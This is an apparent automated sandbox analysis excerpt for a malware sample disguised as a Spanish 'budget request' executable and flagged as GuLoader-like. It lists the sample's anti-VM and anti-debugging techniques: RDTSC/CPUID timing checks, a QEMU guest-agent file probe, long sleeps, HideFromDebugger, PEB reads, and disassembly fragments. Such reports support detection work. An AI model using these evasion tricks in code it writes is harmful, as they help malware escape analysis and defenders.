Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe RDTSC instruction interceptor: First address: 000000000056755F second address: 000000000056757D instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a mov esi, edx 0x0000000c pushad 0x0000000d mov eax, 00000001h 0x00000012 cpuid 0x00000014 bt ecx, 1Fh 0x00000018 jc 00007FD4AD1AA552h 0x0000001a popad 0x0000001b lfence 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe RDTSC instruction interceptor: First address: 000000000056757D second address: 000000000056755F instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a sub edx, esi 0x0000000c cmp edx, 00000000h 0x0000000f jle 00007FD4ACB61440h 0x00000011 ret 0x00000012 add edi, edx 0x00000014 pop ecx 0x00000015 dec ecx 0x00000016 cmp ecx, 00000000h 0x00000019 jne 00007FD4ACB61463h 0x0000001b push ecx 0x0000001c call 00007FD4ACB614D2h 0x00000021 lfence 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_0056755C 1_2_0056755C
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe TID: 1252 Thread sleep count: 45 > 30
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe TID: 1252 Thread sleep time: -450000s >= -30000s
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe File opened / queried: C:\ProgramData\qemu-ga\qga.state
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_0056755C rdtsc 1_2_0056755C
Source: Solicitud de presupuesto.exe, 00000001.00000002.575875706.0000000000560000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: C:\ProgramData\qemu-ga\qga.state

Anti Debugging

Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_005604BE NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000 1_2_005604BE
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_00566853 mov eax, dword ptr fs:[00000030h] 1_2_00566853
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_005638F9 mov eax, dword ptr fs:[00000030h] 1_2_005638F9
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_00562647 mov eax, dword ptr fs:[00000030h] 1_2_00562647
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_00561A3A mov eax, dword ptr fs:[00000030h] 1_2_00561A3A
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_00562629 mov eax, dword ptr fs:[00000030h] 1_2_00562629
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_00567EF2 mov eax, dword ptr fs:[00000030h] 1_2_00567EF2
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_00567EFC mov eax, dword ptr fs:[00000030h] 1_2_00567EFC
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_00567F46 mov eax, dword ptr fs:[00000030h] 1_2_00567F46
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_00567362 mov eax, dword ptr fs:[00000030h] 1_2_00567362
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_00567F96 mov eax, dword ptr fs:[00000030h] 1_2_00567F96
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_0056755C rdtsc 1_2_0056755C
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Process created: C:\Users\user\Desktop\Solicitud de presupuesto.exe C:\Users\user\Desktop\Solicitud de presupuesto.exe

Stealing of Sensitive Information

Source: Initial file Signature Results: GuLoader behavior